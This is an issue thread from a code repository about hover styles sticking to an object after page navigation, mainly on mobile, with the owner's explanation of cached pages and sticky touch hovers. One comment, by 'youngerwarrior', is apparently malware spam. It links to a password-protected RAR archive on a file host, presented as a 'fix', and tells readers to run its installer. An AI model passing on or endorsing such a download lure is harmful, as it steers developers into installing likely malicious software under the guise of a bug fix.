### ISSUE TITLE
Pinball - Hover Highlights Next Page Object

### ISSUE THREAD

**Issue by emb417** [emb417/metaforiq-next#43]
After clicking on an object on page 1, page 2 shows an object with hover styles.

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by emb417** [comment]
Forcing pages to load more often without cache seems to reduce this. Hover states on mobile tend to be sticky. There might be ways to remove hover on mobile, although some hovers are for tooltips and whatnot, so having the touch state invoke the hover style is wanted and expected with the current design.
